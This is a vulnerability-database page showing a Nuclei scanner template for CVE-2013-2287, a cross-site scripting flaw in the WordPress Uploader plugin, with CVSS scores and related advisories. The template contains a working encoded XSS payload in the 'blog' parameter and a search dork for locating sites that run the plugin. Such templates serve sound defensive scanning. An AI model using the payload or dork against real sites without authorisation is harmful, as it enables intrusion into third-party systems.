Lucene search
ProjectDiscoveryNUCLEI:CVE-2013-2287HistoryJul 11, 2021 - 10:18 a.m.
WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting
2021-07-1110:18:20
ProjectDiscovery
github.com
2
wordpress
plugin
uploader
cross-site scripting
roberta_bramski
vulnerabilities
remote attackers
web script
html
data theft
session hijacking
defacement
CVSS2
4.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
AI Score
6.1
Confidence
High
EPSS
0.002
Percentile
59.9%
Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.
id: CVE-2013-2287
info:
name: WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
remediation: |
Update to the latest version of the WordPress Plugin Uploader or apply a patch provided by the vendor to fix the XSS vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-2287
- https://www.dognaedis.com/vulns/DGS-SEC-16.html
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2013-2287
cwe-id: CWE-79
epss-score: 0.00219
epss-percentile: 0.59874
cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: "roberta_bramski"
product: uploader
google-query: "inurl:\"/wp-content/plugins/uploader\""
tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski,intrusive
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/uploader/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Uploader'
- "Tags:"
condition: and
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502202f5a88bdea6734d0ab391b6fd5fd8bb17242dabdbf218f078c26dbbf2c20174b022100d2610dcc53a2bbfefe240bb8964c81be7f35628b5cc37995ab62ac5be77bed16:922c64590222798bb761d5b6d8e72950Related
prion
prion
Cross site scripting
2014-04-04 14:55:00
nvd
nvd
CVE-2013-2287
2014-04-04 14:55:11
cvelist
cvelist
CVE-2013-2287
2014-04-04 14:00:00
wpvulndb
wpvulndb
Uploader 1.0.4 - notify.php blog Parameter XSS
2014-08-01 10:58:36
cve
cve
CVE-2013-2287
2014-04-04 14:55:11
patchstack
patchstack
WordPress Uploader Plugin <= 1.0.4 - Cross Site Scripting
2013-03-01 00:00:00
openvas
openvas
WordPress Uploader Plugin Multiple Vulnerabilities
2014-04-14 00:00:00
exploitdb
exploitdb
WordPress Plugin Uploader - 'blog' Cross-Site Scripting
2013-03-01 00:00:00
CVSS2
4.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
AI Score
6.1
Confidence
High
EPSS
0.002
Percentile
59.9%
Related for NUCLEI:CVE-2013-2287